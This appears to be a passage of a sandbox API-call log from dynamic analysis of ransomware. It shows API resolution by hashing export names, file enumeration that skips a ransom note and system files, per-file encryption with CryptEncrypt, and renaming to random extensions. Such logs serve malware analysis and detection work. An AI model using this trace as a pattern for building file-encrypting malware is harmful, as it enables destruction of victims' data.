(lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.481] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.481] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.481] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.481] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.482] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.482] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.482] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.482] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.482] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.482] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.482] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.482] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.482] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.482] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.482] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.482] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.482] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.482] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.482] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.482] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.482] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.482] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.482] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.482] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.483] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.483] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.483] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.483] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.483] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.483] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.483] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.483] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.483] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.483] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.483] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.483] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.483] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.483] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.483] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.483] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.483] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.483] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.484] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.484] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF") returned 83 [0185.484] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF.rberMZ7") returned 91 [0185.484] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.0xtlf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF.rberMZ7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.0xtlf.rbermz7"), dwFlags=0x0) returned 1 [0185.484] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.485] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.485] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.485] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaee492e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url.wFb1E8", cAlternateFileName="IESITE~1.WFB")) returned 1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="DECRYPT-FILES.txt") returned 1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="autorun.inf") returned 1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="boot.ini") returned 1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="desktop.ini") returned 1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="ntuser.dat") returned -1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="iconcache.db") returned 1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="bootsect.bak") returned 1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="ntuser.dat.log") returned -1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="thumbs.db") returned -1 [0185.485] lstrcmpiW (lpString1="IE site on Microsoft.com.url.wFb1E8", lpString2="Bootfont.bin") returned 1 [0185.485] lstrlenW (lpString="IE site on Microsoft.com.url.wFb1E8") returned 35 [0185.485] lstrcmpiW (lpString1="wFb1E8", lpString2="lnk") returned 1 [0185.486] lstrcmpiW (lpString1="wFb1E8", lpString2="exe") returned 1 [0185.486] lstrcmpiW (lpString1="wFb1E8", lpString2="sys") returned 1 [0185.486] lstrcmpiW (lpString1="wFb1E8", lpString2="dll") returned 1 [0185.486] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.486] lstrlenW (lpString="IE site on Microsoft.com.url.wFb1E8") returned 35 [0185.486] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0185.486] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="IE site on Microsoft.com.url.wFb1E8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8" [0185.486] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.wfb1e8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.486] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.486] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.486] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.487] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.487] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.487] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.487] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.487] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.488] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.488] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.488] CloseHandle (hObject=0x268) returned 1 [0185.488] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.488] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.489] CloseHandle (hObject=0x0) returned 0 [0185.489] CloseHandle (hObject=0x264) returned 1 [0185.489] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.489] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.490] GetTickCount () returned 0x11359c4 [0185.490] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.490] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.490] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.490] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.490] lstrlenA (lpString="kernel32.dll") returned 12 [0185.491] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.491] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.491] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.491] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.491] lstrlenA (lpString="ADDATOMA") returned 8 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.491] lstrlenA (lpString="ADDATOMW") returned 8 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.491] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.491] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.491] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.491] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.491] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.491] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.491] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.491] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.491] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.491] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.491] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.492] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.492] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.492] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.492] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.492] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.492] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.492] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.492] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.492] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.492] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.492] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.492] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.492] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.492] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.492] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.493] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.493] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.493] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.493] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.493] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.493] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.493] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.493] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.493] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.493] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.493] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.493] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.493] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.493] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.493] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.493] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.493] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.493] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") 